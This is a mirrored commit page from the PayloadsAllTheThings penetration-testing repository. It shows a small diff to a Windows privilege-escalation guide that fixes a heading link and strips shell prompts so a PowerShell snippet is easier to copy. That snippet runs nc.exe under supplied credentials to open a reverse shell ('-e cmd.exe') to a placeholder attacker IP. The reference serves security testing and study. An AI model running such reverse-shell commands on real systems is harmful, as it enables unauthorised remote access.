Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-06-30 19:02:55 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update Windows - Privilege Escalation.md

Browse Source 
Make powershell on EoP - Runas easier to copy paste
This commit is contained in:
Fanis Katsimpas 2020-03-22 19:25:35 +00:00 committed by GitHub
parent 4303caa08c
commit 2bdbb2dbc5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Methodology and Resources/Windows - Privilege Escalation.md
View File

@ -12,7 +12,7 @@
* [Search for file contents](#search-for-file-contents)
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
* [Passwords in unattend.xml](#passwords-in-unattend.xml)
* [Passwords in unattend.xml](#passwords-in-unattendxml)
* [Wifi passwords](#wifi-passwords)
* [Passwords stored in services](#passwords-stored-in-services)
* [Powershell history](#powershell-history)
@ -712,9 +712,9 @@ C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\us
```
```powershell
$ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$ computer = "<hostname>"
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
```